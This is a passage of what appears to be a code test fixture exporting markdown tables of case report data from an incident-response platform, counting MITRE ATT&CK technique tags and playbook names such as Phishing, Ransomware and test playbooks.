+-----------------------------------------------------+-----------+
| mitre-attack:t1195-supply_chain_compromise          | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1491-defacement                       | 4         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1141-input_prompt                     | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1100-web_shell                        | 74        |
+-----------------------------------------------------+-----------+
| mitre-attack:t1501-systemd_service                  | 9         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1194-spearphishing_via_service        | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1035-service_execution                | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1161-lc_load_dylib_addition           | 6         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1182-appcert_dlls                     | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1494-runtime_data_manipulation        | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1211-exploitation_for_defense_evasion | 7         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1086-powershell                       | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1115-clipboard_data                   | 2         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1505-server_software_component        | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1193-spearphishing_attachment         | 5         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1012-query_registry                   | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1490-inhibit_system_recovery          | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1077-windows_admin_shares             | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1127-trusted_developer_utilities      | 1         |
+-----------------------------------------------------+-----------+
| mitre-attack:t1006-file_system_logical_offsets      | 1         |
+-----------------------------------------------------+-----------+ 



***Frequency Count of Playbooks*** 
 
 

This is a frequency count of the playbooks attached to any cases that were created during the reporting period (B). 

+--------------------------------------------------------------------------------------------+-----------+
| **Playbook**                                                                               | **Count** |
+============================================================================================+===========+
| DELETED_58b905ca-77ea-410c-965f-e1f64448dc0f_blah blah playbook                            | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_c598ccfd-d87c-4fbb-a0fc-9d4515a4f24b_Copy of 02 - Admin made this playbook (1)     | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Denial of Service                                                                          | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_b50c6a70-05f8-4cfd-816c-77d071977d15_Copy of 0.8.13 Playbook test #1 (1)           | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| WAF Alert                                                                                  | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| DNS Hijacking                                                                              | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| new test                                                                                   | 3         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_dc3341d8-2fc6-4b4e-b187-e217b7116a0c_Copy of new test                              | 3         |
+--------------------------------------------------------------------------------------------+-----------+
| Test Playbook                                                                              | 3         |
+--------------------------------------------------------------------------------------------+-----------+
| Website Defacement                                                                         | 3         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_8609e65f-f2b7-48ba-b3fa-e76693a1a118_Copy of 02 - Admin made this playbook         | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Phishing                                                                                   | 18        |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_e5dd6254-8770-4b9e-a72c-738d8cdac56f_aaljafas                                      | 6         |
+--------------------------------------------------------------------------------------------+-----------+
| Malicious SMS                                                                              | 6         |
+--------------------------------------------------------------------------------------------+-----------+
| new playbook 123                                                                           | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Rogue Access Point                                                                         | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| Excessive Account Lockouts                                                                 | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_485eb8c5-92d9-4503-8d01-6c709c453db5_02 - Admin made this playbook                 | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Brute Force                                                                                | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_a169dbb7-2016-49d0-98e3-0889b9c7cd9c_RP0002_playbook_data_breach                   | 6         |
+--------------------------------------------------------------------------------------------+-----------+
| Sarahs Playbook                                                                            | 4         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_f7558511-f680-4721-8573-085efcd63daa_Copy of Bitcoin mining (2)                    | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| TEST test test                                                                             | 3         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_0486e32e-b620-406b-8b89-a43c51a2f358_Copy of New Playbook 8.12 test - Changed Name | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Bitcoin mining                                                                             | 4         |
+--------------------------------------------------------------------------------------------+-----------+
| Ransomware                                                                                 | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| C2 Traffic                                                                                 | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_b1abd676-be06-419c-879c-545f0c783823_RP_0001_test_phishing_email                   | 1         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_a862a9fc-ebc2-4674-a22f-e401b4c7565b_Copy of Bitcoin mining (1)                    | 4         |
+--------------------------------------------------------------------------------------------+-----------+
| DELETED_cbab5f7a-0922-457a-8b51-e43a48ad1a78_Copy of Bitcoin mining                        | 3         |
+--------------------------------------------------------------------------------------------+-----------+
| Data Breach                                                                                | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| 1 test new playbook                                                                        | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Malware infection                                                                          | 2         |
+--------------------------------------------------------------------------------------------+-----------+
| Compromised Host                                                                           | 1         |
+--------------------------------------------------------------------------------------------+-----------+
`;

export const mdReportTableWithNoTrailingLineBreak = `+---------------------------------------------------------------------------------------------+-----------+
| **Playbook**                                                                                | **Count** |
+=============================================================================================+===========+
| DELETED_d747fef9-eb13-4b5a-a0ee-54a51b63455b_playbook1 ff0bb39a-eba9-432c-899c-4b9a9a27afc4 | 8         |
+---------------------------------------------------------------------------------------------+-----------+
| If condition with variable23ffd267-a921-430b-867c-a5f2a4a3339b                              | 5         |
+---------------------------------------------------------------------------------------------+-----------+
| cacao playbook 754aec81-e881-433e-877d-f6d06f378bb2                                         | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| playbook1 fd7003a5-d640-4d57-bc0a-16d7deb318be                                              | 7         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 1fec67ac-1bfb-4eb6-8dbe-779b470b1680                                                     | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 3e06f04b-0484-4e86-8511-3496edb84191                                                     | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| playbook2 fd7003a5-d640-4d57-bc0a-16d7deb318be                                              | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 76f349b5-2948-457b-bf99-e8b977a287b4                                                     | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| Simple Lookup Manual                                                                        | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| If condition with variabled4e1c684-1f57-40c1-bdb2-42607e6c1005                              | 4         |
+---------------------------------------------------------------------------------------------+-----------+
| Copy of p1 3e06f04b-0484-4e86-8511-3496edb84191                                             | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| p3 53d93b94-6599-49e0-a13e-53bbd16c430c                                                     | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| Two If, Two Variablesb5b35822-9ee4-4c6c-9d53-5270a6c2fb43                                   | 2         |
+---------------------------------------------------------------------------------------------+-----------+
| cacao playbook to attach 3b7c6a9b-9b93-4b22-9ff7-647f17767b23                               | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| playbook2 ff0bb39a-eba9-432c-899c-4b9a9a27afc4                                              | 6         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 3e9d8182-3913-450c-b90e-203f5dc65f05                                                     | 4         |
+---------------------------------------------------------------------------------------------+-----------+
| Two If, Two Variables69b01e31-7ad7-4d20-a602-ec26b5db424a                                   | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| cacao playbook to attach db875f96-3c0e-4ff3-8604-69cc221364e5                               | 1         |
+---------------------------------------------------------------------------------------------+-----------+`;

export const mdReportTableWithTrailingLineBreak = `+---------------------------------------------------------------------------------------------+-----------+
| **Playbook**                                                                                | **Count** |
+=============================================================================================+===========+
| DELETED_d747fef9-eb13-4b5a-a0ee-54a51b63455b_playbook1 ff0bb39a-eba9-432c-899c-4b9a9a27afc4 | 8         |
+---------------------------------------------------------------------------------------------+-----------+
| If condition with variable23ffd267-a921-430b-867c-a5f2a4a3339b                              | 5         |
+---------------------------------------------------------------------------------------------+-----------+
| cacao playbook 754aec81-e881-433e-877d-f6d06f378bb2                                         | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| playbook1 fd7003a5-d640-4d57-bc0a-16d7deb318be                                              | 7         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 1fec67ac-1bfb-4eb6-8dbe-779b470b1680                                                     | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 3e06f04b-0484-4e86-8511-3496edb84191                                                     | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| playbook2 fd7003a5-d640-4d57-bc0a-16d7deb318be                                              | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 76f349b5-2948-457b-bf99-e8b977a287b4                                                     | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| Simple Lookup Manual                                                                        | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| If condition with variabled4e1c684-1f57-40c1-bdb2-42607e6c1005                              | 4         |
+---------------------------------------------------------------------------------------------+-----------+
| Copy of p1 3e06f04b-0484-4e86-8511-3496edb84191                                             | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| p3 53d93b94-6599-49e0-a13e-53bbd16c430c                                                     | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| Two If, Two Variablesb5b35822-9ee4-4c6c-9d53-5270a6c2fb43                                   | 2         |
+---------------------------------------------------------------------------------------------+-----------+
| cacao playbook to attach 3b7c6a9b-9b93-4b22-9ff7-647f17767b23                               | 1         |
+---------------------------------------------------------------------------------------------+-----------+
| playbook2 ff0bb39a-eba9-432c-899c-4b9a9a27afc4                                              | 6         |
+---------------------------------------------------------------------------------------------+-----------+
| p1 3e9d8182-3913-450c-b90e-203f5dc65f05                                                     | 4         |
+---------------------------------------------------------------------------------------------+-----------+
| Two If, Two Variables69b01e31-7ad7-4d20-a602-ec26b5db424a                                   | 3         |
+---------------------------------------------------------------------------------------------+-----------+
| cacao playbook to attach db875f96-3c0e-4ff3-8604-69cc221364e5                               | 1         |
+---------------------------------------------------------------------------------------------+-----------+
`;
